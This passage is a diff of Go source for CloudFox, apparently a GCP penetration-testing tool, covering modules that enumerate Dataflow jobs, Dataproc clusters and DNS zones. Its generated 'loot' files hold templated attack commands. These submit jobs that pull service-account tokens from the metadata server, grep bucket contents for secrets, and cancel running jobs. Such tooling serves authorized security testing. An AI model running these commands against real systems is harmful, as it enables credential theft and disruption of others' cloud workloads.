	pathBuilder := m.BuildPathBuilder()

	err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData)
	if err != nil {
		logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME)
	}
}

// writeFlatOutput renders one combined table set across all projects, used
// when no hierarchy is available or flat output was requested.
func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) {
	allPaths := m.getAllExfiltrationPaths()
	allExports := m.getAllPublicExports()

	for _, projectID := range m.ProjectIDs {
		m.initializeLootForProject(projectID)
	}

	tables := []internal.TableFile{}

	misconfigBody := m.pathsToTableBody(allPaths, allExports)
	if len(misconfigBody) > 0 {
		tables = append(tables, internal.TableFile{
			Name:   "data-exfiltration-misconfigurations",
			Header: m.getMisconfigHeader(),
			Body:   misconfigBody,
		})
	}

	if len(m.FoxMapperFindings) > 0 {
		tables = append(tables, internal.TableFile{
			Name:   "data-exfiltration-permissions",
			Header: m.getFoxMapperHeader(),
			Body:   m.foxMapperFindingsToTableBody(),
		})
	}

	// Header-only loot files (nothing past the warning banner) are skipped.
	var lootFiles []internal.LootFile
	for _, projectLoot := range m.LootMap {
		for _, loot := range projectLoot {
			if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") {
				lootFiles = append(lootFiles, *loot)
			}
		}
	}

	// For flat output, generate a combined playbook for all projects
	for _, projectID := range m.ProjectIDs {
		playbook := m.generatePlaybookForProject(projectID)
		if playbook != nil && playbook.Contents != "" {
			// Rename to include project
			playbook.Name = fmt.Sprintf("data-exfiltration-commands-%s", projectID)
			lootFiles = append(lootFiles, *playbook)
		}
	}

	output := DataExfiltrationOutput{
		Table: tables,
		Loot:  lootFiles,
	}

	scopeNames := make([]string, len(m.ProjectIDs))
	for i, projectID := range m.ProjectIDs {
		scopeNames[i] = m.GetProjectName(projectID)
	}

	err := internal.HandleOutputSmart(
		"gcp",
		m.Format,
		m.OutputDirectory,
		m.Verbosity,
		m.WrapTable,
		"project",
		m.ProjectIDs,
		scopeNames,
		m.Account,
		output,
	)
	if err != nil {
		logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME)
		m.CommandCounter.Error++
	}
}
diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go
new file mode 100644
index 00000000..a2a5c31b
--- /dev/null
+++ b/gcp/commands/dataflow.go
@@ -0,0 +1,336 @@
package commands

import (
	"context"
	"fmt"
	"strings"
	"sync"

	dataflowservice "github.com/BishopFox/cloudfox/gcp/services/dataflowService"
	"github.com/BishopFox/cloudfox/globals"
	"github.com/BishopFox/cloudfox/internal"
	gcpinternal "github.com/BishopFox/cloudfox/internal/gcp"
	"github.com/spf13/cobra"
)

// GCPDataflowCommand is the cobra entry point for the Dataflow enumeration module.
var GCPDataflowCommand = &cobra.Command{
	Use:     globals.GCP_DATAFLOW_MODULE_NAME,
	Aliases: []string{"df", "pipelines"},
	Short:   "Enumerate Dataflow jobs and pipelines",
	Long: `Enumerate Dataflow jobs with security analysis.

Features:
- Lists all Dataflow jobs (batch and streaming)
- Shows service account configuration
- Identifies network exposure (public IPs)
- Analyzes temp/staging storage locations
- Detects default service account usage`,
	Run: runGCPDataflowCommand,
}

// DataflowModule holds per-project enumeration results; mu guards the maps
// because projects are processed concurrently.
type DataflowModule struct {
	gcpinternal.BaseGCPModule
	ProjectJobs    map[string][]dataflowservice.JobInfo     // projectID -> jobs
	LootMap        map[string]map[string]*internal.LootFile // projectID -> loot files
	FoxMapperCache *gcpinternal.FoxMapperCache              // Cached FoxMapper analysis results
	mu             sync.Mutex
}

// DataflowOutput bundles the module's tables and loot for the output writers.
type DataflowOutput struct {
	Table []internal.TableFile
	Loot  []internal.LootFile
}

func (o DataflowOutput) TableFiles() []internal.TableFile { return o.Table }
func (o DataflowOutput) LootFiles() []internal.LootFile   { return o.Loot }

// runGCPDataflowCommand wires up the command context and runs the module.
// Initialization errors are assumed to be reported by InitializeCommandContext.
func runGCPDataflowCommand(cmd *cobra.Command, args []string) {
	cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAFLOW_MODULE_NAME)
	if err != nil {
		return
	}

	module := &DataflowModule{
		BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx),
		ProjectJobs:   make(map[string][]dataflowservice.JobInfo),
		LootMap:       make(map[string]map[string]*internal.LootFile),
	}
	module.Execute(cmdCtx.Ctx, cmdCtx.Logger)
}
module := &DataflowModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectJobs: make(map[string][]dataflowservice.JobInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAFLOW_MODULE_NAME, m.processProject) + + allJobs := m.getAllJobs() + if len(allJobs) == 0 { + logger.InfoM("No Dataflow jobs found", globals.GCP_DATAFLOW_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicIPs := 0 + for _, job := range allJobs { + if job.State == "JOB_STATE_RUNNING" { + running++ + } + if job.UsePublicIPs { + publicIPs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataflow job(s) (%d running, %d with public IPs)", + len(allJobs), running, publicIPs), globals.GCP_DATAFLOW_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataflowModule) getAllJobs() []dataflowservice.JobInfo { + var all []dataflowservice.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) 
+ } + return all +} + +func (m *DataflowModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Dataflow in project: %s", projectID), globals.GCP_DATAFLOW_MODULE_NAME) + } + + svc := dataflowservice.New() + jobs, err := svc.ListJobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAFLOW_MODULE_NAME, + fmt.Sprintf("Could not list Dataflow jobs in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectJobs[projectID] = jobs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dataflow-commands"] = &internal.LootFile{ + Name: "dataflow-commands", + Contents: "# Dataflow Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, job := range jobs { + m.addToLoot(projectID, job) + } + m.mu.Unlock() +} + +func (m *DataflowModule) addToLoot(projectID string, job dataflowservice.JobInfo) { + lootFile := m.LootMap[projectID]["dataflow-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# DATAFLOW JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# ID: %s\n"+ + "# Type: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Public IPs: %v\n"+ + "# Workers: %d\n", + job.Name, job.ProjectID, job.Location, + job.ID, job.Type, job.State, + job.ServiceAccount, job.UsePublicIPs, job.NumWorkers, + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe job: +gcloud dataflow jobs describe %s --project=%s --region=%s + +# Show job details: +gcloud dataflow jobs show %s --project=%s 
--region=%s + +# List all Dataflow jobs: +gcloud dataflow jobs list --project=%s --region=%s + +# Get job metrics: +gcloud dataflow metrics list %s --project=%s --region=%s + +`, + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + ) + + // Bucket inspection + if job.TempLocation != "" { + lootFile.Contents += fmt.Sprintf( + "# Inspect temp bucket (may contain intermediate data):\n"+ + "gsutil ls -r %s\n\n", + job.TempLocation, + ) + } + if job.StagingLocation != "" { + lootFile.Contents += fmt.Sprintf( + "# Inspect staging bucket (contains job artifacts):\n"+ + "gsutil ls -r %s\n\n", + job.StagingLocation, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + lootFile.Contents += fmt.Sprintf( + "# Cancel running job:\n"+ + "gcloud dataflow jobs cancel %s --project=%s --region=%s\n\n"+ + "# Drain running job (graceful stop):\n"+ + "gcloud dataflow jobs drain %s --project=%s --region=%s\n\n"+ + "# Submit a new Dataflow job (code execution as SA: %s):\n"+ + "# Template-based job:\n"+ + "gcloud dataflow jobs run cloudfox-test --gcs-location=gs://dataflow-templates/latest/Word_Count --region=%s --project=%s --parameters=inputFile=gs://BUCKET/input.txt,output=gs://BUCKET/output\n\n"+ + "# Flex template job (custom container = full code execution):\n"+ + "gcloud dataflow flex-template run cloudfox-flex --template-file-gcs-location=gs://YOUR_BUCKET/template.json --region=%s --project=%s --service-account-email=%s\n\n", + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + job.ServiceAccount, + job.Location, job.ProjectID, + job.Location, job.ProjectID, job.ServiceAccount, + ) + + // Inspect staging/temp for secrets + if job.TempLocation != "" || job.StagingLocation != "" { + lootFile.Contents += "# Search job buckets for secrets/credentials:\n" + if job.TempLocation != "" { + lootFile.Contents += 
fmt.Sprintf("gsutil cat %s/** 2>/dev/null | grep -iE '(password|secret|token|key|credential)'\n", job.TempLocation) + } + if job.StagingLocation != "" { + lootFile.Contents += fmt.Sprintf("gsutil cat %s/** 2>/dev/null | grep -iE '(password|secret|token|key|credential)'\n", job.StagingLocation) + } + lootFile.Contents += "\n" + } +} + +func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DataflowModule) getTableHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Name", + "Type", + "State", + "Location", + "Service Account", + "SA Attack Paths", + "Public IPs", + "Workers", + } +} + +func (m *DataflowModule) jobsToTableBody(jobs []dataflowservice.JobInfo) [][]string { + var body [][]string + for _, job := range jobs { + publicIPs := "No" + if job.UsePublicIPs { + publicIPs = "Yes" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if job.ServiceAccount != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) + } else { + attackPaths = "No" + } + } + + body = append(body, []string{ + job.ProjectID, + m.GetProjectName(job.ProjectID), + job.Name, + job.Type, + job.State, + job.Location, + job.ServiceAccount, + attackPaths, + publicIPs, + fmt.Sprintf("%d", job.NumWorkers), + }) + } + return body +} + +func (m *DataflowModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, jobs := range m.ProjectJobs { + body := m.jobsToTableBody(jobs) + tableFiles := []internal.TableFile{{Name: 
"dataflow", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = DataflowOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) + } +} + +func (m *DataflowModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allJobs := m.getAllJobs() + body := m.jobsToTableBody(allJobs) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{Name: "dataflow", Header: m.getTableHeader(), Body: body}} + output := DataflowOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) + } +} diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go new file mode 100644 index 00000000..85e6fbaa --- /dev/null +++ b/gcp/commands/dataproc.go @@ -0,0 +1,412 @@ 
+package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDataprocCommand = &cobra.Command{ + Use: globals.GCP_DATAPROC_MODULE_NAME, + Aliases: []string{"dp", "hadoop", "spark"}, + Short: "Enumerate Dataproc clusters", + Long: `Enumerate Dataproc (Hadoop/Spark) clusters. + +Features: +- Lists all Dataproc clusters across regions +- Shows service account configuration +- Identifies public IP exposure +- Checks for Kerberos authentication +- Analyzes security configurations`, + Run: runGCPDataprocCommand, +} + +type DataprocModule struct { + gcpinternal.BaseGCPModule + ProjectClusters map[string][]dataprocservice.ClusterInfo // projectID -> clusters + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper results + mu sync.Mutex +} + +type DataprocOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataprocOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataprocOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPDataprocCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DATAPROC_MODULE_NAME) + if err != nil { + return + } + + module := &DataprocModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]dataprocservice.ClusterInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = 
gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAPROC_MODULE_NAME, m.processProject) + + allClusters := m.getAllClusters() + if len(allClusters) == 0 { + logger.InfoM("No Dataproc clusters found", globals.GCP_DATAPROC_MODULE_NAME) + return + } + + runningCount := 0 + publicCount := 0 + for _, cluster := range allClusters { + if cluster.State == "RUNNING" { + runningCount++ + } + if !cluster.InternalIPOnly { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Dataproc cluster(s) (%d running, %d with public IPs)", + len(allClusters), runningCount, publicCount), globals.GCP_DATAPROC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *DataprocModule) getAllClusters() []dataprocservice.ClusterInfo { + var all []dataprocservice.ClusterInfo + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + +func (m *DataprocModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Dataproc in project: %s", projectID), globals.GCP_DATAPROC_MODULE_NAME) + } + + svc := dataprocservice.New() + + clusters, err := svc.ListClusters(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAPROC_MODULE_NAME, + fmt.Sprintf("Could not list Dataproc clusters in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectClusters[projectID] = clusters + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dataproc-commands"] = &internal.LootFile{ + Name: "dataproc-commands", + Contents: "# Dataproc Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, cluster := range clusters { + m.addToLoot(projectID, cluster) + } + 
m.mu.Unlock() +} + +func (m *DataprocModule) addToLoot(projectID string, cluster dataprocservice.ClusterInfo) { + lootFile := m.LootMap[projectID]["dataproc-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# DATAPROC CLUSTER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Public IPs: %s\n"+ + "# Kerberos: %s\n", + cluster.Name, cluster.ProjectID, cluster.Region, + cluster.State, cluster.ServiceAccount, + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), + ) + + if len(cluster.MasterInstanceNames) > 0 { + lootFile.Contents += fmt.Sprintf("# Master Instances: %s\n", strings.Join(cluster.MasterInstanceNames, ", ")) + } + + // === ENUMERATION COMMANDS === + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe cluster: +gcloud dataproc clusters describe %s --region=%s --project=%s + +# List jobs on this cluster: +gcloud dataproc jobs list --cluster=%s --region=%s --project=%s + +# Get cluster IAM policy: +gcloud dataproc clusters get-iam-policy %s --region=%s --project=%s + +# List cluster metadata/properties: +gcloud dataproc clusters describe %s --region=%s --project=%s --format=json | jq '.config.softwareConfig.properties' + +`, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + ) + + // Bucket commands + if cluster.ConfigBucket != "" { + lootFile.Contents += fmt.Sprintf( + "# List config bucket (may contain init scripts with secrets):\n"+ + "gsutil ls -r gs://%s/\n"+ + "# Download init actions (check for hardcoded credentials):\n"+ + "gsutil -m cp -r 
gs://%s/google-cloud-dataproc-metainfo/ /tmp/dataproc-config-%s/\n\n", + cluster.ConfigBucket, + cluster.ConfigBucket, cluster.Name, + ) + } + if cluster.TempBucket != "" { + lootFile.Contents += fmt.Sprintf( + "# List temp bucket (may contain job output/data):\n"+ + "gsutil ls -r gs://%s/\n\n", + cluster.TempBucket, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH to master node + if len(cluster.MasterInstanceNames) > 0 { + masterName := cluster.MasterInstanceNames[0] + lootFile.Contents += fmt.Sprintf( + "# SSH to master node (runs as cluster SA: %s):\n"+ + "gcloud compute ssh %s --project=%s --zone=ZONE\n\n"+ + "# SSH through IAP (if direct SSH blocked):\n"+ + "gcloud compute ssh %s --tunnel-through-iap --project=%s --zone=ZONE\n\n", + cluster.ServiceAccount, + masterName, cluster.ProjectID, + masterName, cluster.ProjectID, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# SSH to master node:\n"+ + "gcloud compute ssh %s-m --project=%s --zone=ZONE\n\n"+ + "# SSH through IAP (if direct SSH blocked):\n"+ + "gcloud compute ssh %s-m --tunnel-through-iap --project=%s --zone=ZONE\n\n", + cluster.Name, cluster.ProjectID, + cluster.Name, cluster.ProjectID, + ) + } + + // Submit jobs for code execution + lootFile.Contents += fmt.Sprintf( + "# Submit PySpark job for code execution (runs as SA: %s):\n"+ + "cat > /tmp/cloudfox_spark.py << 'SPARKEOF'\n"+ + "import subprocess, json\n"+ + "result = subprocess.run(['curl', '-s', '-H', 'Metadata-Flavor: Google',\n"+ + " 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'],\n"+ + " capture_output=True, text=True)\n"+ + "print(json.loads(result.stdout))\n"+ + "SPARKEOF\n"+ + "gcloud dataproc jobs submit pyspark /tmp/cloudfox_spark.py --cluster=%s --region=%s --project=%s\n\n"+ + "# Submit Spark job:\n"+ + "gcloud dataproc jobs submit spark --cluster=%s --region=%s --project=%s --class=MAIN_CLASS --jars=JAR_PATH\n\n"+ + "# 
Submit Hive query (access HDFS/HBase data):\n"+ + "gcloud dataproc jobs submit hive --cluster=%s --region=%s --project=%s --execute=\"SHOW DATABASES; SHOW TABLES;\"\n\n"+ + "# Submit Pig job:\n"+ + "gcloud dataproc jobs submit pig --cluster=%s --region=%s --project=%s --execute=\"sh curl -s http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H Metadata-Flavor:Google\"\n\n", + cluster.ServiceAccount, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + ) + + // Access web UIs + lootFile.Contents += fmt.Sprintf( + "# Access Hadoop/Spark Web UIs (via SSH tunnel or component gateway):\n"+ + "# YARN ResourceManager: http://:8088\n"+ + "# HDFS NameNode: http://:9870\n"+ + "# Spark History: http://:18080\n"+ + "# Create SSH tunnel to YARN UI:\n"+ + "gcloud compute ssh %s-m --project=%s --zone=ZONE -- -L 8088:localhost:8088 -N\n\n", + cluster.Name, cluster.ProjectID, + ) +} + +func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DataprocModule) getTableHeader() []string { + return []string{ + "Project", + "Name", + "Region", + "State", + "Master", + "Master Instances", + "Workers", + "Service Account", + "SA Attack Paths", + "Public IPs", + "Kerberos", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterInfo) [][]string { + var body [][]string + for _, cluster := range clusters { + sa := cluster.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa 
!= "(default)" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + masterConfig := fmt.Sprintf("%s x%d", cluster.MasterMachineType, cluster.MasterCount) + workerConfig := fmt.Sprintf("%s x%d", cluster.WorkerMachineType, cluster.WorkerCount) + + // Master instances + masterInstances := "-" + if len(cluster.MasterInstanceNames) > 0 { + masterInstances = strings.Join(cluster.MasterInstanceNames, ", ") + } + + // If cluster has IAM bindings, create one row per binding + if len(cluster.IAMBindings) > 0 { + for _, binding := range cluster.IAMBindings { + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + attackPaths, + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), + binding.Role, + binding.Member, + }) + } + } else { + // Cluster has no IAM bindings - single row + body = append(body, []string{ + m.GetProjectName(cluster.ProjectID), + cluster.Name, + cluster.Region, + cluster.State, + masterConfig, + masterInstances, + workerConfig, + sa, + attackPaths, + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), + "-", + "-", + }) + } + } + return body +} + +func (m *DataprocModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, clusters := range m.ProjectClusters { + body := m.clustersToTableBody(clusters) + tableFiles := []internal.TableFile{{Name: "dataproc-clusters", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents 
!= "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = DataprocOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } +} + +func (m *DataprocModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allClusters := m.getAllClusters() + body := m.clustersToTableBody(allClusters) + + tables := []internal.TableFile{{Name: "dataproc-clusters", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := DataprocOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DATAPROC_MODULE_NAME) + } +} diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go new file mode 100644 index 00000000..2172faed --- /dev/null +++ b/gcp/commands/dns.go @@ -0,0 +1,550 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + DNSService "github.com/BishopFox/cloudfox/gcp/services/dnsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal 
"github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDNSCommand = &cobra.Command{ + Use: globals.GCP_DNS_MODULE_NAME, + Aliases: []string{"zones", "cloud-dns"}, + Short: "Enumerate Cloud DNS zones and records with security analysis", + Long: `Enumerate Cloud DNS managed zones and records across projects. + +Features: +- Lists all DNS managed zones (public and private) +- Shows zone configuration (DNSSEC, visibility, peering) +- Enumerates DNS records for each zone +- Identifies interesting records (A, CNAME, TXT, MX) +- Shows private zone VPC bindings +- Generates gcloud commands for DNS management + +Security Columns: +- Visibility: public or private +- DNSSEC: Whether DNSSEC is enabled +- Networks: VPC networks for private zones +- Peering: Cross-project DNS peering + +Attack Surface: +- Public zones expose domain infrastructure +- TXT records may contain sensitive info (SPF, DKIM, verification) +- Private zones indicate internal network structure +- DNS forwarding may expose internal resolvers`, + Run: runGCPDNSCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DNSModule struct { + gcpinternal.BaseGCPModule + + ProjectZones map[string][]DNSService.ZoneInfo // projectID -> zones + ProjectRecords map[string][]DNSService.RecordInfo // projectID -> records + TakeoverRisks []DNSService.TakeoverRisk // kept global for summary + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DNSOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DNSOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DNSOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDNSCommand(cmd *cobra.Command, args 
[]string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DNS_MODULE_NAME) + if err != nil { + return + } + + module := &DNSModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectZones: make(map[string][]DNSService.ZoneInfo), + ProjectRecords: make(map[string][]DNSService.RecordInfo), + TakeoverRisks: []DNSService.TakeoverRisk{}, + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DNSModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DNS_MODULE_NAME, m.processProject) + + allZones := m.getAllZones() + allRecords := m.getAllRecords() + + if len(allZones) == 0 { + logger.InfoM("No DNS zones found", globals.GCP_DNS_MODULE_NAME) + return + } + + // Count zone types and security issues + publicCount := 0 + privateCount := 0 + transferModeCount := 0 + dnssecOffCount := 0 + + for _, zone := range allZones { + if zone.Visibility == "public" { + publicCount++ + // Check DNSSEC status for public zones + if zone.DNSSECState == "" || zone.DNSSECState == "off" { + dnssecOffCount++ + } else if zone.DNSSECState == "transfer" { + transferModeCount++ + } + } else { + privateCount++ + } + } + + // Check for subdomain takeover risks + ds := DNSService.New() + m.TakeoverRisks = 